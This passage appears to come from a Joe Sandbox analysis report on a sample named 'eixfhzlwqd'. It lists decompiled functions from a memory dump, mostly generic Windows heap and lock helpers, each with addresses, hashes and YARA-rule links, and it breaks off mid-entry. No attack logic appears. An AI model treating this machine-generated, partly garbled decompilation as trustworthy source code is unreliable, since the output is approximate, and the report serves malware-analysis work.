                                                              Uniqueness Score: -1.00%

                                                              Function 00ADD380 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00ADD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L00A2E8B0(__ecx, _a4, 0xfff);
					L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                              0x00add38a
                                                              0x00add39b
                                                              0x00add3b1
                                                              0x00000000
                                                              0x00add3b6
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                              • Instruction ID: cc6e39da2da89ae9d502d861c4fe907b4e2660216da4da4a24ac17e3c94d935f
                                                              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                              • Instruction Fuzzy Hash: 21E0C231284254BBDB225F44CD01F697B26EB507A0F204032FE099E791C7719C91E6C4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5A185 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A5A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0xb167e4 >= 0xa) {
					if(_t5 < 0xb16800 || _t5 >= 0xb16900) {
						return L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E00A40010(0xb167e0, _t5);
				}
			}





                                                              0x00a5a190
                                                              0x00a5a1a6
                                                              0x00a5a1c2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5a192
                                                              0x00a5a192
                                                              0x00a5a19f
                                                              0x00a5a19f

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2ac5e5a5d0d2dc50583d52eee246eea77afa033ba3021da6c05e2e426da64b9
                                                              • Instruction ID: b4d88b5005fdd3ac00ba3bf38a28929941417dcc4f2771719f6c277b6c2551ad
                                                              • Opcode Fuzzy Hash: d2ac5e5a5d0d2dc50583d52eee246eea77afa033ba3021da6c05e2e426da64b9
                                                              • Instruction Fuzzy Hash: B5D02E632214001ACB2D23218E14B652392F7E4701FB08AADF6070F9E0DE708CD8D10A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A516E0 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A516E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E00A51710(0xb167e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L00A44620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                              0x00a516e8
                                                              0x00a516ef
                                                              0x00a516f3
                                                              0x00a516fe
                                                              0x00000000
                                                              0x00a51700
                                                              0x00a5170d
                                                              0x00a5170d
                                                              0x00a516f2
                                                              0x00a516f2
                                                              0x00a516f2
                                                              0x00a516f2

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c9603303de7ea1b39597392a65136daa0cade00221bb0a87ac7a325bcf074d0
                                                              • Instruction ID: 6dfa63ffb65278e06c1ced365af0af7b31efcac308ed94d92f8a4de341cbf566
                                                              • Opcode Fuzzy Hash: 2c9603303de7ea1b39597392a65136daa0cade00221bb0a87ac7a325bcf074d0
                                                              • Instruction Fuzzy Hash: 1DD0A73114010052DA2D5B149905B242251FBC4786F38046CF907498C1CFB0CC96E488
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AA53CA Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00AA53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E00A3EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                              0x00aa53ca
                                                              0x00aa53ce
                                                              0x00aa53d9
                                                              0x00aa53de
                                                              0x00aa53e1
                                                              0x00aa53e1
                                                              0x00aa53e6
                                                              0x00aa53f3
                                                              0x00000000
                                                              0x00aa53f8
                                                              0x00aa53fb

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                              • Instruction ID: ca3bfdfd64cbd933ebfb903138fc08afb548369dfc66490f4dff12a6ff062a0e
                                                              • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                              • Instruction Fuzzy Hash: 45E0B675A44A849BCF12DB99C660F5EB7F5BB85B40F150454B4085F6A1C764AD00CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A535A1 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A535A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E00A3EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                              0x00a535a1
                                                              0x00a535a1
                                                              0x00a535a5
                                                              0x00a535ab
                                                              0x00a535ab
                                                              0x00a535b5
                                                              0x00000000
                                                              0x00a535c1
                                                              0x00a535b7

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                              • Instruction ID: 84126c8c5b1d486b4f020a4d672d25394f4106ad510ba5974bb1c0603a47d85a
                                                              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                              • Instruction Fuzzy Hash: DDD0C9335511849EDF52EB60C23876877B2BF8039AF683065A84746992E33A8F5ED601
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3AAB0 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A3AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                              0x00a3aab6
                                                              0x00a3aabb
                                                              0x00a8a442
                                                              0x00000000
                                                              0x00a8a448
                                                              0x00a8a454
                                                              0x00a8a454
                                                              0x00a3aac1
                                                              0x00a3aac1
                                                              0x00a3aac6
                                                              0x00a3aac6

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                              • Instruction ID: f1b2c150e1fcd02d807525df8a19e260364bc51ab1a29f4e782414fde580439c
                                                              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                              • Instruction Fuzzy Hash: 72D0E935352990CFD716DB1DC554B1573A4FB54B84FC50490E541CB761E66DDD44CA01
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAA537 Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00AAA537(intOrPtr _a4, intOrPtr _a8) {

				return L00A48E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                              0x00aaa553

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                              • Instruction ID: eaeb2131d1a5f3ffb36c2b1752e5bbc4972a24545ce809c686963370f49fc3c3
                                                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                              • Instruction Fuzzy Hash: C6C08C37080248BBCB127F81DD02F0A7F2AFB94B60F008010FA080B571CA3AE970EB84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A2DB40 Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A2DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L00A44620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                              0x00a2db4d
                                                              0x00a2db54
                                                              0x00a2db5f
                                                              0x00a2db56
                                                              0x00a2db56
                                                              0x00a2db5c
                                                              0x00a2db5c

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                              • Instruction ID: 5fab9decf7e67f0e0f7c88dee0253e06e51c6be323e71c7d3eef22b0ef0a3f3b
                                                              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                              • Instruction Fuzzy Hash: 7DC08C30280A00AAEB222F20CE02B00B6A0BB41B01F4604A0B300DA0F1DB78DC01E600
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A2AD30 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A2AD30(intOrPtr _a4) {

				return L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                              0x00a2ad49

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                              • Instruction ID: cd02ec53589f44e4a1cf68295826c6f4a9d6d1868bd16159b6402dff73c7add4
                                                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                              • Instruction Fuzzy Hash: 89C08C32080288BBC7126A45CE01F057B29E790B60F000020F6040A6628A32E860D588
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A376E2 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A376E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                              0x00a376e4
                                                              0x00000000
                                                              0x00a376f8
                                                              0x00a376fd

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                              • Instruction ID: f654b6e356d29a4eb075ef5ece3655b7e076c6588e1784cf434aef1adc5393f8
                                                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                              • Instruction Fuzzy Hash: 19C08CB41499C05AEB3A5708CE32B283650AB08708F88099CBA01294A3C368AC02C208
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A536CC Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A536CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L00A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                              0x00a536d2
                                                              0x00a536e8
                                                              0x00a536d4
                                                              0x00a536e5
                                                              0x00a536e5

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                              • Instruction ID: e0a34d0012cbd535c530fa5267b78151243c484ceb7f7a17d1f310d079a409e9
                                                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                              • Instruction Fuzzy Hash: A1C02B75150440BBDB153F30CE01F16F254FB80B62F6403587220458F0D5389C00E100
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A43A1C Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A43A1C(intOrPtr _a4) {
				void* _t5;

				return L00A44620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                              0x00a43a35

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                              • Instruction ID: 52c32fdb2050deabd99ebd22631cb94f4ab354372893df05d397b62a4f5b584a
                                                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                              • Instruction Fuzzy Hash: 94C04C36180648BBC7126E45DD01F15BB69E795B60F154021B6040A5618576ED61D598
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A47D50 Relevance: .0, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A47D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                              0x00a47d56
                                                              0x00a47d5b
                                                              0x00a47d60
                                                              0x00a47d5d
                                                              0x00a47d5d
                                                              0x00a47d5d

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                              • Instruction ID: 929125c413fdfdebb79189d5c71b7a227173326657719543ce06e57db82c8c3f
                                                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                              • Instruction Fuzzy Hash: 88B092383119808FCE16DF28C080B1933E4BB84B40B8400D0E400CBA20D329E8008900
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A52ACB Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A52ACB() {
				void* _t5;

				return E00A3EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                              0x00a52adc

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                              • Instruction ID: 15017f342d94be7e0be3d135a3e9c02fe30de8f58e4fcd9bd5065b565ffc19ef
                                                              • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                              • Instruction Fuzzy Hash: 40B092329104408BCF02EF40C610B19B331AB00750F058490A001279618228AC01CA40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A698A0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38cad53cddf58bc345d2cc9b7434b41b951d870f1c58a4046e59583b48215d72
                                                              • Instruction ID: 9373538f0912e053569de5a9a7bfd49dd44f20a41d837298c1968252c3882278
                                                              • Opcode Fuzzy Hash: 38cad53cddf58bc345d2cc9b7434b41b951d870f1c58a4046e59583b48215d72
                                                              • Instruction Fuzzy Hash: 1A90026130100402E203616948146060019DBD1385F91C022E1455555D86658953F172
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69820 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 194c3ae5bd7dac777acd475360fae4fbb0916e6c33b35629ff9270cd24a4faed
                                                              • Instruction ID: 6bcc67c6100570530744f9a88b42dd784897433dbb6b9e8ea579e81d4ec268a8
                                                              • Opcode Fuzzy Hash: 194c3ae5bd7dac777acd475360fae4fbb0916e6c33b35629ff9270cd24a4faed
                                                              • Instruction Fuzzy Hash: AE90027124100402E242716948046060019ABD0381F91C022A0455554E86958A56FAA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A6B040 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5e6a977f498344bb87201769f4d62c527f70449d11f1ee48778b241e566f41f
                                                              • Instruction ID: 05adc3e39763556b9266b3ae213cd2270522dab8cb6f541cf2329619174e2840
                                                              • Opcode Fuzzy Hash: c5e6a977f498344bb87201769f4d62c527f70449d11f1ee48778b241e566f41f
                                                              • Instruction Fuzzy Hash: 8D9002A1601140435641B1694C044065025ABE1341391C131A0485560C86A88855E2A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A695F0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4f56c0be010bc95d6282b44ddce5e6e04dab61731e7df7221e858a94ca7a38f4
                                                              • Instruction ID: 2854e7c54e42e7b8497f06ddd63eba44244f70866b6e1268fbb873bfbdfd9388
                                                              • Opcode Fuzzy Hash: 4f56c0be010bc95d6282b44ddce5e6e04dab61731e7df7221e858a94ca7a38f4
                                                              • Instruction Fuzzy Hash: 2D90027120100802E20561694C0468600159BD0341F51C021A6055655E96A58891B171
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A699D0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2be3a5642636af148c770eaeb5fd974aab49da54354ad5373f622103be868cf0
                                                              • Instruction ID: 8cf160eb58acd16872b7cd322bfc8a2bccb57c3d1f81f73fddf6cad89d57df64
                                                              • Opcode Fuzzy Hash: 2be3a5642636af148c770eaeb5fd974aab49da54354ad5373f622103be868cf0
                                                              • Instruction Fuzzy Hash: 839002A121100042E2056169480470600559BE1341F51C022A2185554CC5698C61A165
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b74f698527267375ec73efc84150e8ae4b1154155d0f6d0b31a14f42b494f8f
                                                              • Instruction ID: 0e6765a25468c69b2624b40f8f06144e64d4346cad136b04e345330c0ab46e0f
                                                              • Opcode Fuzzy Hash: 3b74f698527267375ec73efc84150e8ae4b1154155d0f6d0b31a14f42b494f8f
                                                              • Instruction Fuzzy Hash: BF9002E1201140925601A2698804B0A45159BE0341B51C026E1085560CC5658851E175
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A6AD30 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 97fd76760b589c5f9af3d59b723d765afe70b24c2aa35221e295f67b1009e333
                                                              • Instruction ID: 334631062774b9612c65657e267ef719efd856e49e018b8a83bb731c441f91a8
                                                              • Opcode Fuzzy Hash: 97fd76760b589c5f9af3d59b723d765afe70b24c2aa35221e295f67b1009e333
                                                              • Instruction Fuzzy Hash: BA900271A0500012A24171694C146464016ABE0781B55C021A0545554C89948A55A3E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69560 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b8b5435ada3328d16d1b9a5434931e6279f52075b70c5bd4aa51c7af509e8b33
                                                              • Instruction ID: e2561301e82270e67f6abec70d7f891f8dfa85b83f608a3ed377ae451cc9517c
                                                              • Opcode Fuzzy Hash: b8b5435ada3328d16d1b9a5434931e6279f52075b70c5bd4aa51c7af509e8b33
                                                              • Instruction Fuzzy Hash: 09900265221000021246A5690A0450B0455ABD6391391C025F1447590CC6618865A361
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69950 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bf6ecb4100357e95dcea5ff51e77d441c5f7872d1582408b1709ef2b258c707
                                                              • Instruction ID: f0e9916b11c35644c7ff33a5f9cbdaf9db430dbc3135651b78fdcc56bb9d2fdc
                                                              • Opcode Fuzzy Hash: 6bf6ecb4100357e95dcea5ff51e77d441c5f7872d1582408b1709ef2b258c707
                                                              • Instruction Fuzzy Hash: 529002A120140403E24165694C0460700159BD0342F51C021A2095555E8A698C51B175
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69A80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b002d1be0b320e8bc8891f5bd26f428bb5cf750ada733535b46145a8437b1078
